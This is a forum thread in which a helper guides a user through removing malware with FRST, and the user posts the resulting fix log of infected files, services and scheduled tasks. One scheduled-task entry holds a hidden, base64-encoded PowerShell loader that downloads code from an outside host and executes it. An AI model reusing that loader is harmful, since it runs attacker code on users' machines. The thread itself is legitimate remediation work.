Solved Pretty sure our laptop has a virus/malware but don't know what to do - need step-by-step instruction

I only need missed part of Addition.txt log.
Part starting with:
==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
Click to expand...
 
Thanks for letting me know that I didn't have to restart to redo.......have posted all that was in the logs and was careful to ensure that nothing was missing . However, there was nothing more on the additional txt log as mentioned before. Doing my best to make sure that I follow your instructions :)
 
Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

When done restart computer in normal mode and see if you can operate it normally.
 

Attachments

  • fixlist.txt
    17.2 KB · Views: 4
So before I start this next task, please answer the following questions in BOLD BLUE FONT as I do want to be very clear on what I'm doing:


1. Download attached fixlist.txt file and save it to the Desktop. (on the secondary computer that is working with the "clean USB" and then save it to the USB and then transfer the USB, saving both on the desktop of the affected laptop - as I don't have internet access in safe mode on the laptop - CORRECT?)
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait. (this is done on the affected computer - CORRECT?)

The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply. (taking the USB from the affected laptop as I have for the Search and FRST text log - CORRECT?)

When done restart computer in normal mode and see if you can operate it normally (are you asking me to restart the affected laptop - CORRECT?)
 
Sorry, just being as clear as possible

Do it in the command prompt as in the very first instructions?
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    Note:     Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
So as follows:
E: \FRST64
the tool will run then press FIX

(this is done on the affected computer - CORRECT?)
 
Okay done!! Here's the log

Fix result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 20:36:06) Run:1
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Replace: C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
Replace: C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll C:\Windows\System32\dnsapi.dll
Replace: C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
Replace: C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll C:\Windows\SysWOW64\dnsapi.dll
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
C:\Program Files\Sound+
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
C:\Program Files\amztab
S2 Gejdiubx; "C:\Users\owner\AppData\Roaming\RujgAjueocf\Remdhuus.exe" -cms [X]
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X]
2015-10-26 15:43 - 2015-10-26 15:43 - 0001167 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt
2015-10-26 15:43 - 2015-10-26 15:43 - 0000000 _____ () C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2015-04-21 19:15 - 2016-01-06 00:14 - 0000291 _____ () C:\Users\owner\AppData\Roaming\WB.CFG
2016-01-09 16:32 - 2016-01-09 16:32 - 0041472 _____ () C:\Users\owner\AppData\Local\Donelectronics.dat
2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe
Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe
Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
C:\Program Files (x86)\SwiftSearch_1.10.0.25
Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEIAVQBUAG0AMwBSAGYAOAAwAHUANABrAEsAVwByAEUAeQBQAHcASwBXAEwAdwBJAHQAWQBlAHAAbQBvAFIAVABIAEkAUABQAC0AawB1AEsAMQBiAFYARABmAHMAWQBUAHcAeQBZAHMAbABTAGYARQBZAGYAOABWAEwATQAwADkAXwAwAF8AZAA2AEsAYwBZAEIANgAyAEwAcwBFAG8ANgBDAHcAbABtAFIAUAAxAEEAMwBSAHEANwBiAEIAbQB2AGcALQBBAGEAVwBxAFcAYgBkAFkANABsAHIATgBCAGwATABYAG8AMAB3ADEAYwBOAGwAaABtAGYAYwBxAGkAYwBmAGgAagBLAHkAaQBGAGUALQBfADkAUgBjADIAcAA3AE4AUgA5AFoAZgBRAF8AegBNAGkANwBUAFoATgBWAEMAWgBaADQANQBYAHEAZABUAEQAWgBxAGUAawB4AFEASgBTAHMARABiAEwAbABxAC0AWABaAGQASwBxAEsAdQB4AGwATwBrAEUAbABVAEwAawBoAGwAcgBhAGYAVABtADUAQwBuAHEAYgBWAE0AcwBYAC0AYgB2AF8AMQBvADYASQBNAFIANQBJAFgAVgBTAGsAWABiAE4ANgBMAGkAcgBsAHYANwBZAE0AdQAxADEAegB1AGUAdQB0AFEATQA1AHcAcgBDAGgALQBqAGkANgBkAHkAYQBRAEQAdQBOADAAeABtAHIAVABrAHAATAB0AHoASwBRAGoAeABwAG4AYgBiAHcAWQBPAFMAVgBJAEsAMgBOAFoAYQBEAFgAdAA5AGoAXwBvAE4ASQB1AE0AZwAzADAAVQA4AFUARAByAE0ATQBhADMANgBiAFQAVwBBAGUARQBoAGcAdQBuAFEAMgB4AEUAeQBsAEgAdgBXAHIATgBrAC0AWQBDAE4AWQBtAFAAegB4AHEAVQA0AHcARQBGADkAUgBsAGYAcgBaADgAQgBEADgAZgBHAHoAMwAwADIAbABfAEMAMABDAHAAZwB0ADYAOQBaAEMAYgBFAEcAZwA3AC0AOAA3AEIAWABvAHIAcgA4AFkAbABXAFYAQgA5AGYANAB0AGQAZgBQAHAAOQByADgAXwA0AEcARgBzADgAQQA5AGEAOQBoAFgAcwB3AGUAcwBFAHgAcwBnAHUAQwBnAGEAZgBvAEsAVQB6AEgAVwBsAGsAUQBzAFQAdgB5AFAAUgBiAE0AbgBlAEEARABJAG8ASAAyAEkAWAA1AEsALQBNAGQASQBkAHcAdwAzAGkAdAA4AFMAOABSAEkAbABMAGsAUQBhAHcAegByAGsAZgBkAG8AUQB0AHgAcgBrADEAQwBoAGkAVAAzADEAQgBoAGoAXwBIAHkAWgBWADkAZABjAFQAbgBJADIAMgBwAE4ARQBjADMAMgBFAHIAeQA2AE0AdgBSAEwAWgBIADkAaABuAHcATQBjAHAAYgAxAEcARgA2ADIAQQBUAHEARwBiAC0AdgBIADIAeQBNAEcAMQBzAHoAcgBtAFEAZQBaADcANABBAFkAQQBkAE4AOQBvAFkAWAA2AHIAbABoAGcAMQBwAFoATQBFAGYAMgBNAGgAdwBRAHMAcQBjAFAAagBwAGsAeQBoAFgAegB4AFMAbwBzAHUAagB5AEgAeQBFAFcAZwBxADUAbgBZAHgAMQBLAHEARwB1AG8AYwB2AE8AdgByAHAAcgBmAGwAZgA5AFcAcgBMAEYAagBWAG8AcQBQAHcAbQA2AC0ASgBmAEcAVwBWAGoAVgAzAFoAOQBVAEEAQwBaAHMASwB2AGcASAB3AEkAeQBxAFIAWgBtAGcANgBJAHIAcwA2AGgAeABCAHUASQA3AGcAVQBWAEcANgBQAEcAUABhAE0AdwBDAHkAcgAwAEMAWQB5AFAAWQBYAFYAQgB0AGwAcQBCAF8ASABNAEQARwBnAFAAdABhAGkAcAB2AEkAcwA4AFkATwBEAGYAUQBLAGwAegBwAHkAZABSAGQAQwAzAE4ATgBhADMAWAA5AHoAMQBPAHUAaQBzAHIAVQBDAGIARABvAE4AOQB5AG0AUgBOAEwAVwBDADcATgBEAFMAcwBGADUAYQBnADQAcQBzAE4AMABfAEIASQB1AGwARgBzADcAcgA0ADQAeQBoADEAaAByAHMAUwAyADkASABKAHIANgB5AGMAaQBHAFcAVgBaAFcAaQBMAHEAUABnAEEAbwA0AGoAMwA4AG0AZgBqAE8ARAA3AGoAMQBqADQAYgBqAFMAZQBBADAAeABmAG8AMABLAEYAZABoAEIARABTAHcATQBoAG8AZABjAEoAZQAxAE0ASQBWAFYATQAxAFIAaABEAEIAMAA1AHYATgAmAGMAPQBrAGoAQQBpADMAeABrAHEAegB2AGsAcgAxAFAAcABNAGkAcABfAEgAUgBkAEsARABkADQAZABPAGMAUQBuAFMAUQBMAF8ALQB5AHYAQwBwAG4AegBsAFoAYgBqADIAVABxADgAYgBsADQAcABuAEQAYgAyADYASwBKAHAAYwBPAEkAcgBUAFoARABhAC0ATQBEADcAegBwAHMARgAyAFgAcABlAE8AeQBwADYAbwBXAFEASQBWAGwATQBPAGsATAA1ADkASwBDAG4AbwA0AGEATQBZADgAbgA4AGoAegBQAFYAWgBXAFEAQgAzADkAZgBfAGcAcgBzAG4ALQA5AFoALQBKAEEAUQAtAFMANgBXADUAcABYAGQAZwBKAEEAZABvAFgAWQA3AGgARABjADEATQBjAEUASwBUAGkANQBrAE8ANQBuAGEAcgB1AHYAagBsAHQASQB5AFQARQBXADUALQBtAEwATwBGAGYASgB4AHcAWABoAGcAaAA0AGkAWQBsAGsAZQAyAHIAMgBLAFEARwBqAEIAbABoAFEAZABzAE0ANgB3AFgAYQAzAHoAWABVAHgARABkADkAbAA2AHQAeAAyAG4ANQA0AG8ANQA5AHEAMABmADcAaABJAFQAUgBHAGwAOQBnAHQANgBBAFMAMABMADAAOQBMAGEAbQBVAEcAZQBRAHkAZQBZAFcAcABoAFUAMQBDAHMAdwBEAGwAdgAzAFEAXwAtAFQATwBZAGMAdAB5AE8AUQA4AGIAOAAtAEIAWgBTAEsARwBFAGsASgA0AHUAOABfADgAVgAzAHoASwBvAHQASABZAEMAMQA5ADgAZQByAHkAagB1ADcAQwAxADEAUQBVAEkAbAA1AFUAQwAzAHQAdwBFAG0AUABGAEoAOAA0AFEAaABFADQARQB6AHYAVQBXAHUAOABFAG4AZQBNAGsAawBrADAAcwBNAFUAeABTAG4AcwBOAGEAZwBaAEcAcQA2AHUAOABqAHEAMQB4AGIAZgBpAGcAegBYAFIAZgBzADUAVgBLAEYAOABIAEgANgA5AEoAUwB0AGMAbQBhAG0ANQBrAGIANwBPADgANgBGAFUAaQBrAEMAQQBPAGwAaAA1AGQARABkAGcAQQB3AF8AbgByAGMAdQA4AEsAbwBEAHoAZwBvAFYASgBLAEwAZQBsADYATABlAFcAVAAyAGUAZgA5AGYARwByAFcAOQA2ADkASAB2AC0ASwB4AHEAcQBhAEMAUwBVADkAcwBOAFEATwBCAHcAeABoADMAWABYAFUANQBBAHMAZgBlAGkAQQA2AE8ARQA2ADQAdABMAHcAZQBIAEcAMgBDAFYATQA0AG0AUwBTAGEAVQBmADAAUgB0AGcAYQAzAGgAVgBIADEAdAB4AEcAZgAtAE0AdQBtAGMAVwAxAEYAeQA4ADUAbQBPAHEAYgBxAEgASQAzADkAeQB6AGMATQBpAHkAOQBRAGUARQBaAE0ARwBUAEoAeQByAE4AZAA1AG4AMwBqADUAcABpAGEAagBCAHAANgBRAGEAUgBrAHAAbABhAGwAZQBfADAAUgBWAHQAbwBTAEoAcgAtAFEAbwBFAHMAYgBwADUAdgBuAEQASQBJAGgAdABjAHQATwBlAEsAaQBsAEYAVAA0ADgAeABXADgARgBzAGMAegBoAGIARwBkAHQANQBlAFMAMABnAG4AcQBtAG4ARQBLAGwARwBqAEcAWABxADUARABWAHAATwBqAEQAdQBDAFoAZAB4AHEAUwBkAFgAcABzAFYATQB2ADIAQgBqAFAAMgBfAGsATwB1AFIAQwA2ADYAbABHADMAZgBGAE4AUQBUAHYAUABaAFkAVQBNAGkAUwAwAFEAZABkADYATAAtAHgAbQA3AGsATgA5AEQANQBVAEYAXwBGAFUAdwBrAEwASwBFADgARQB5ADYAaABhAE8ARABjAFgAVgBaAHcAcwAyAFkAUABtAEEALQBCAGgAOQBOAGUAOABQAGYAdgBtADEAegA0ADkAVgAxADcAdABBADAATQBoAEMAUwBzADAAQQBZAFMAaQBGAGoAbABlAEkAbgA4ADIATwByAHAAYQBmADgARgB1AEwARgBDAHQAeABJAHoANABXADAAbQB0AHAAUABRAFMAdwBSADQASgB5AGEAUABXAEoAVgBMAGYAMABxAEsAdwBxAFQALQByAFkAVABQAFkAYwBvAFcAdQBIAGYAcwBRAEcASABYAEgAaQBBAFkAQQBfAHcAMQBSAFEAdgBOAG4AWgB2AEEAbQBJADcAeQBQAGYAYgBoAFAAaQBhAEMARAB4AFgAZAB5AFQAbQBqAE4ARwBYAG4AbwBkADMAZgAxADcATQBqAEYATQBFAHoAagA0AF8AbABGAG4AdQBkAGYAeABtAHoAcABXAFEANQBsAGYAMwBIACYAcgA9ADcANwA1ADkAOAA3ADUAMgA5ADMAMwA5ADUANgAzADAANAA1ADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABGADcARgA0ADcALQAwAEIANwBBAC0AMAA5ADcARgAtADcARQAxADEALQAwADUAMABBADAAOQAwADQAMQAxADcAOAB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAE8ATABWAFoAUwBTAFEATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" &amp; del "C:\ProgramData\Medlight\Physronwarm.reg" &amp; SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
C:\ProgramData\Medlight\Physronwarm.reg
Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
C:\ProgramData\Medlight
C:\ProgramData\FlashBeat
Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; del "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
C:\ProgramData\Service1291
Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
